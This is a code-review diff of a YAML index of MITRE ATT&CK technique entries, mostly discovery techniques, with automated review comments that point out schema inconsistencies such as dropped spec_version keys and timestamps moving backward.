+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
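Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is dropped from T1056.004 with nothing replacing it, while entries that were not regenerated in this diff, for example T1556.004 and T1016.001 further down, keep theirs. The regenerated objects no longer carrying the key suggests the upstream bundle dropped the field, in which case it should be stripped from every entry rather than left present on some techniques and absent on others for no data reason. The newly added `revoked: false` and `x_mitre_deprecated: false` keys are also new to this file; confirm the index generator tolerates (or ignores) them.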
@@ -48032,9 +48752,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
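Review bot: `spec_version: '2.1'` is removed from every technique object in this region while `x_mitre_attack_spec_version` is kept and bumped to 3.2.0. `spec_version` is a required common property on STIX 2.1 objects, so anything downstream that validates these entries as STIX 2.1 will now reject them. If the generator switched from a STIX 2.1 source bundle to a STIX 2.0 one (whose objects carry no per-object `spec_version`), say so in the PR description; otherwise re-add the key.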
@@ -48065,7 +48784,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
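Review bot: the `modified` timestamp for T1556.004 moves backward, from 2022-05-11T14:00:00.188Z to 2021-12-14T23:14:26.107Z, and the same pattern repeats below for T1613, T1016.001, T1615, T1652, T1069.002, T1007 and T1120, all going from a `T14:00:00.188Z` value to an earlier one. The old values sharing an identical time of day reads like a release-wide stamp, while the new values look like per-object edit times, which is plausible if the source bundle changed; but any consumer that compares `modified` to decide whether a technique was updated will treat these as regressions, and a `modified` earlier than a previously published value is exactly what STIX versioning rules say must not happen. Confirm the source bundle is the intended one and state the switch in the PR description.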
@@ -48089,8 +48808,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
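Review bot: T1556.004 ends up with no ATT&CK spec version at all: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed, and unlike T1552.007 above or T1082 below nothing adds a `3.2.0` value. Either this object was not regenerated from the same bundle as the others or the generator dropped the key on this path; either way the file now mixes entries with and without `x_mitre_attack_spec_version`, and `x_mitre_permissions_required: Administrator` survives here while the regenerated entries lose it. One generation path should produce the whole file.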
@@ -48155,12 +48872,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -48219,7 +48935,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -48240,7 +48955,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -48261,13 +48976,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
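Review bot: T1016.001 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` with nothing replacing them, while its `x_mitre_permissions_required: User` is kept; that is the inverse of what the regenerated entries (T1056.004, T1087.003) do, where the permissions list goes away and `x_mitre_attack_spec_version: 3.2.0` stays. Two different generation paths appear to be writing this file; pick one so the schema is uniform across techniques.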
@@ -48290,15 +49003,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -48324,13 +49036,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48355,12 +49066,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -48402,13 +49112,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -48469,12 +49178,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -48538,19 +49246,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
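Review bot: the `-`/`+` pair inside the T1087.002 description (`utility, dscacheutil -q group` and `on macOS, and ldapsearch`) shows no visible difference in this rendering, so the change is whitespace, line folding or a non-printing character. Trailing whitespace from the YAML folder is harmless, but a non-printing character picked up from the upstream text would survive into the generated CSV indexes; run `git diff --ws-error-highlight=all` or `cat -A` over those two lines before merging and, if it is a stray character, strip it.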
@@ -48597,7 +49304,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -48664,12 +49370,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -48759,18 +49464,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
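Review bot: the Deloitte `Environment Awareness` citation gains a `/edit` suffix on the Drive URL and a 2024 retrieval date; `/edit` is the editor UI path for the same file id, so this is cosmetic, but the same source is cited under T1497.003 elsewhere in this file and the two citations of one document should end up in the same URL form. Not blocking.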
@@ -48813,12 +49517,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -48859,12 +49562,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -48949,7 +49651,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -49011,12 +49712,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -49067,12 +49767,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49083,7 +49782,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -49098,7 +49796,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -49146,7 +49843,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests: []
T1016.002:
@@ -49218,12 +49916,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49265,122 +49962,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
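Review bot: the removed `id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0` / `created: '2020-03-06T21:11:11.225Z'` pair and the added `id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470` / `created: '2020-02-21T21:08:33.237Z'` pair in this hunk belong to two different techniques: the diff has aligned the tail of the old T1497.003 object against the new T1087.003 object (the `4bed873f` id and the `2020-03-06` created date reappear under T1497.003 further down), so the hunk cannot be read as "T1087.003 changed its id". Worth checking the rendered YAML for T1087.003 once applied to confirm that its `id`, `created` and the `mitre-attack` reference (`external_id: T1087.003`) sit together, and regenerating the patch with `git diff --diff-algorithm=patience` (or `histogram`) so reviewers see the two objects separately. The field removals themselves (`x_mitre_permissions_required`, `spec_version: '2.1'`, the old `x_mitre_attack_spec_version: 2.1.0`) line up with the move to `x_mitre_attack_spec_version: 3.2.0`.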
@@ -49395,6 +50043,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -49404,9 +50058,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -49416,102 +50075,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
